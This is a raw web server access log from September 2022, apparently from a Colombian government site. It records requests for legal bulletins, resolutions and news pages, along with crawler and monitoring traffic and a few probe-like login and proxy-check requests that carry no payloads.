185.119.81.104 - - [19/Sep/2022:02:10:41 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [19/Sep/2022:02:10:42 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [19/Sep/2022:02:09:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51993
173.252.107.11 - - [19/Sep/2022:02:11:27 -0500] "GET /alexandra-neuto-una-mujer-que-promueve-la-seguridad-alimentaria-y-el-tejido-social-a-traves-de-huertas.html HTTP/1.1" 206 1075
201.245.192.253 - - [19/Sep/2022:02:11:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [19/Sep/2022:02:15:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:14:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:16:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:02:15:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53195
172.22.2.4 - - [19/Sep/2022:02:17:04 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
157.55.39.202 - - [19/Sep/2022:02:18:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202000-2049.tif HTTP/1.1" 200 5003528
201.245.192.253 - - [19/Sep/2022:02:19:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41989
201.245.192.253 - - [19/Sep/2022:02:19:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42603
190.156.185.197 - - [19/Sep/2022:02:20:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/5770.pdf HTTP/1.1" 200 360537
216.245.221.92 - - [19/Sep/2022:02:21:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:21:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
167.94.145.58 - - [19/Sep/2022:02:22:56 -0500] "GET / HTTP/1.1" 200 319
167.94.145.58 - - [19/Sep/2022:02:22:57 -0500] "GET / HTTP/1.1" 200 319
167.94.145.58 - - [19/Sep/2022:02:22:57 -0500] "PRI * HTTP/2.0" 400 946
167.94.145.58 - - [19/Sep/2022:02:22:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
5.188.210.227 - - [19/Sep/2022:02:23:11 -0500] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 1151
40.77.202.10 - - [19/Sep/2022:02:24:33 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
157.55.39.201 - - [19/Sep/2022:02:26:09 -0500] "GET /BLA/resoluciones/2002RES134.tif HTTP/1.1" 404 1018
216.245.221.92 - - [19/Sep/2022:02:26:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:26:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [19/Sep/2022:02:26:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/5770.pdf HTTP/1.1" 200 360537
172.22.2.4 - - [19/Sep/2022:02:25:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:25:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [19/Sep/2022:02:29:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41989
201.245.192.253 - - [19/Sep/2022:02:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42603
216.245.221.92 - - [19/Sep/2022:02:31:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:31:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:02:30:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:31:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
172.22.2.4 - - [19/Sep/2022:02:31:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
216.245.221.92 - - [19/Sep/2022:02:36:12 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.14 - - [19/Sep/2022:02:36:20 -0500] "GET /mas-de-60-personas-privadas-de-la-libertad-se-certificaron-como-dinamizadores-ambientales.html HTTP/1.1" 206 951
201.245.192.253 - - [19/Sep/2022:02:36:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:02:36:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:37:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
201.245.192.253 - - [19/Sep/2022:02:39:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41989
201.245.192.253 - - [19/Sep/2022:02:39:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42603
216.245.221.92 - - [19/Sep/2022:02:41:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:41:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:02:42:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:43:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [19/Sep/2022:02:46:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:46:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
37.214.74.208 - - [19/Sep/2022:02:47:20 -0500] "GET / HTTP/1.1" 200 319
185.119.81.104 - - [19/Sep/2022:02:47:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [19/Sep/2022:02:47:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
69.171.249.3 - - [19/Sep/2022:02:47:58 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
172.22.2.4 - - [19/Sep/2022:02:48:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:02:49:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
216.245.221.92 - - [19/Sep/2022:02:51:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:51:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:02:54:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Sep/2022:02:56:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:02:56:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:02:55:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [19/Sep/2022:03:01:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:03:01:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:03:00:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:03:00:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
95.108.213.20 - - [19/Sep/2022:03:03:51 -0500] "-" 408 -
5.255.253.178 - - [19/Sep/2022:03:03:56 -0500] "-" 408 -
102.165.48.78 - - [19/Sep/2022:03:04:00 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
87.250.224.64 - - [19/Sep/2022:03:04:03 -0500] "-" 408 -
87.250.224.46 - - [19/Sep/2022:03:04:09 -0500] "-" 408 -
